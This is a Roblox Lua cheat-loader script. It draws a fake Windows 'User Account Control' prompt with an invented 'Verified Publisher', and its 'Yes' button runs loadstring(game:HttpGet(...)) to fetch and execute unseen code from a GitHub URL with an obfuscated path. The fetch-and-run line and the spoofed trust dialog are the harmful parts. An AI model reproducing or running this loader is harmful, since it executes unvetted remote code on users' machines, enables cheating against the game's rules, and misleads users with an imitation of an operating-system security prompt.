-- Gui to Lua
-- Version: 3.2

-- Instances:

Instance.new("Sound", game:GetService("SoundService")).SoundId = "rbxassetid://1544910054"; game:GetService("SoundService").Sound:Play()

local ScreenGui = Instance.new("ScreenGui")
local Main = Instance.new("Frame")
local HumHigh = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local Tacha = Instance.new("TextButton")
local ImageLabel = Instance.new("ImageLabel")
local Frame = Instance.new("Frame")
local ImageLabel_2 = Instance.new("ImageLabel")
local TextLabel_2 = Instance.new("TextLabel")
local ImageLabel_3 = Instance.new("ImageLabel")
local TextLabel_3 = Instance.new("TextLabel")
local TextLabel_4 = Instance.new("TextLabel")
local TextLabel_5 = Instance.new("TextLabel")
local TextLabel_6 = Instance.new("TextLabel")
local Frame_2 = Instance.new("Frame")
local TextLabel_7 = Instance.new("TextLabel")
local Frame_3 = Instance.new("Frame")
local Yes = Instance.new("TextButton")
local No = Instance.new("TextButton")
local ImageLabel_4 = Instance.new("ImageLabel")
local TextLabel_8 = Instance.new("TextLabel")

--Properties:

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Main.Name = "Main"
Main.Parent = ScreenGui
Main.BackgroundColor3 = Color3.fromRGB(254, 254, 254)
Main.BorderColor3 = Color3.fromRGB(232, 232, 232)
Main.BorderSizePixel = 2
Main.Position = UDim2.new(0.280809045, 0, 0.276305467, 0)
Main.Size = UDim2.new(0, 394, 0, 246)

HumHigh.Name = "HumHigh"
HumHigh.Parent = Main
HumHigh.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
HumHigh.BackgroundTransparency = 1.000
HumHigh.Size = UDim2.new(0, 394, 0, 46)

TextLabel.Parent = HumHigh
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0.0939086303, 0, 0.195652172, 0)
TextLabel.Size = UDim2.new(0, 155, 0, 18)
TextLabel.Font = Enum.Font.Arial
TextLabel.Text = "User Account Control"
TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.TextSize = 12.000
TextLabel.TextWrapped = true

Tacha.Name = "Tacha"
Tacha.Parent = HumHigh
Tacha.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Tacha.BackgroundTransparency = 1.000
Tacha.Position = UDim2.new(0.911167383, 0, -0.0869566426, 0)
Tacha.Size = UDim2.new(0, 35, 0, 34)
Tacha.Font = Enum.Font.SourceSans
Tacha.Text = "X"
Tacha.TextColor3 = Color3.fromRGB(0, 0, 0)
Tacha.TextSize = 18.000

ImageLabel.Parent = HumHigh
ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel.BackgroundTransparency = 1.000
ImageLabel.Position = UDim2.new(0.0253807101, 0, 0.142028809, 0)
ImageLabel.Size = UDim2.new(0, 33, 0, 22)
ImageLabel.Image = "http://www.roblox.com/asset/?id=11982926045"

Frame.Parent = Main
Frame.BackgroundColor3 = Color3.fromRGB(12, 73, 116)
Frame.BorderColor3 = Color3.fromRGB(12, 73, 116)
Frame.BorderSizePixel = 2
Frame.Position = UDim2.new(0, 0, 0.151999995, 0)
Frame.Size = UDim2.new(0, 394, 0, 60)

ImageLabel_2.Parent = Frame
ImageLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel_2.BackgroundTransparency = 1.000
ImageLabel_2.Position = UDim2.new(0.04314721, 0, 0.163768008, 0)
ImageLabel_2.Size = UDim2.new(0, 56, 0, 40)
ImageLabel_2.Image = "http://www.roblox.com/asset/?id=11982926045"

TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(0.218274117, 0, 0.212318927, 0)
TextLabel_2.Size = UDim2.new(0, 254, 0, 34)
TextLabel_2.Font = Enum.Font.SourceSans
TextLabel_2.Text = "The use of scripts may result in baning. Are you sure want run this script"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 12.000
TextLabel_2.TextWrapped = true

ImageLabel_3.Parent = Frame
ImageLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel_3.BackgroundTransparency = 1.000
ImageLabel_3.Position = UDim2.new(0.0939086303, 0, 1.24710131, 0)
ImageLabel_3.Size = UDim2.new(0, 70, 0, 56)
ImageLabel_3.Image = "http://www.roblox.com/asset/?id=8597035405"

TextLabel_3.Parent = Frame
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.Position = UDim2.new(0.271573603, 0, 1.24565232, 0)
TextLabel_3.Size = UDim2.new(0, 114, 0, 34)
TextLabel_3.Font = Enum.Font.SourceSans
TextLabel_3.Text = "Program Name:"
TextLabel_3.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_3.TextSize = 15.000
TextLabel_3.TextWrapped = true

TextLabel_4.Parent = Frame
TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_4.BackgroundTransparency = 1.000
TextLabel_4.Position = UDim2.new(0.289340109, 0, 1.61231887, 0)
TextLabel_4.Size = UDim2.new(0, 107, 0, 34)
TextLabel_4.Font = Enum.Font.SourceSans
TextLabel_4.Text = "Verified Publisher:"
TextLabel_4.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_4.TextSize = 15.000
TextLabel_4.TextWrapped = true

TextLabel_5.Parent = Frame
TextLabel_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_5.BackgroundTransparency = 1.000
TextLabel_5.Position = UDim2.new(0.609137118, 0, 1.61231887, 0)
TextLabel_5.Size = UDim2.new(0, 118, 0, 34)
TextLabel_5.Font = Enum.Font.SourceSansBold
TextLabel_5.Text = "Miclobi & Asociates"
TextLabel_5.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_5.TextSize = 15.000
TextLabel_5.TextWrapped = true

TextLabel_6.Parent = Frame
TextLabel_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_6.BackgroundTransparency = 1.000
TextLabel_6.Position = UDim2.new(0.621827424, 0, 1.2456522, 0)
TextLabel_6.Size = UDim2.new(0, 107, 0, 34)
TextLabel_6.Font = Enum.Font.SourceSans
TextLabel_6.Text = "Miclobi X"
TextLabel_6.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_6.TextSize = 15.000
TextLabel_6.TextWrapped = true

Frame_2.Parent = Main
Frame_2.BackgroundColor3 = Color3.fromRGB(240, 240, 238)
Frame_2.BorderSizePixel = 0
Frame_2.Position = UDim2.new(0, 0, 0.829194486, 0)
Frame_2.Size = UDim2.new(0, 394, 0, 44)

TextLabel_7.Parent = Frame_2
TextLabel_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_7.BackgroundTransparency = 1.000
TextLabel_7.Position = UDim2.new(0.499755859, 0, 0.273935497, 0)
TextLabel_7.Size = UDim2.new(0, 203, 0, 18)
TextLabel_7.Font = Enum.Font.SourceSans
TextLabel_7.Text = "Change when these notification appear"
TextLabel_7.TextColor3 = Color3.fromRGB(0, 76, 229)
TextLabel_7.TextSize = 12.000
TextLabel_7.TextWrapped = true

Frame_3.Parent = Main
Frame_3.BackgroundColor3 = Color3.fromRGB(240, 240, 238)
Frame_3.BorderColor3 = Color3.fromRGB(220, 220, 220)
Frame_3.Position = UDim2.new(-0.00253807101, 0, 0.691789925, 0)
Frame_3.Size = UDim2.new(0, 395, 0, 36)

Yes.Name = "Yes"
Yes.Parent = Frame_3
Yes.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Yes.BorderColor3 = Color3.fromRGB(0, 0, 0)
Yes.Position = UDim2.new(0.488607615, 0, 0.166667521, 0)
Yes.Size = UDim2.new(0, 90, 0, 22)
Yes.Font = Enum.Font.SourceSans
Yes.Text = "Yes"
Yes.TextColor3 = Color3.fromRGB(0, 0, 0)
Yes.TextSize = 14.000

No.Name = "No"
No.Parent = Frame_3
No.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
No.BorderColor3 = Color3.fromRGB(0, 0, 0)
No.Position = UDim2.new(0.741772175, 0, 0.166667521, 0)
No.Size = UDim2.new(0, 90, 0, 22)
No.Font = Enum.Font.SourceSans
No.Text = "No"
No.TextColor3 = Color3.fromRGB(0, 0, 0)
No.TextSize = 14.000

ImageLabel_4.Parent = Frame_3
ImageLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel_4.BackgroundTransparency = 1.000
ImageLabel_4.Position = UDim2.new(0.0431022272, 0, 0.158212557, 0)
ImageLabel_4.Size = UDim2.new(0, 27, 0, 24)
ImageLabel_4.Image = "rbxassetid://172617011"

TextLabel_8.Parent = Frame_3
TextLabel_8.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_8.BackgroundTransparency = 1.000
TextLabel_8.Position = UDim2.new(0.0962025225, 0, 0.251207978, 0)
TextLabel_8.Size = UDim2.new(0, 97, 0, 18)
TextLabel_8.Font = Enum.Font.SourceSans
TextLabel_8.Text = "Show Details"
TextLabel_8.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_8.TextSize = 14.000
TextLabel_8.TextWrapped = true

Tacha.MouseButton1Click:Connect(function()
	ScreenGui:Destroy()
end)

No.MouseButton1Click:Connect(function()
	ScreenGui:Destroy()
end)
Yes.MouseButton1Click:Connect(function()
	loadstring(game:HttpGet('https://raw.githubusercontent.com/kaka0221/adkjkashbljdbahjdkasd/main/%3A_%3A_%3A_%3Ad3m0n1i0sg7m%3A_%3A_%3A_%3A_%3A_%3A_%3A_%3A_%3A__%3A_%3A_%3A_%3A%3F%C2%A1%3F%C2%A1%3F%C2%A1%3F%C2%A1%3F%C2%A1%3F%C2%A1%3F%C2%A1%3F%C2%A1%3F%C2%A1%3F%C2%A1%3F%C2%A1%3F%C2%A1'))()
end)
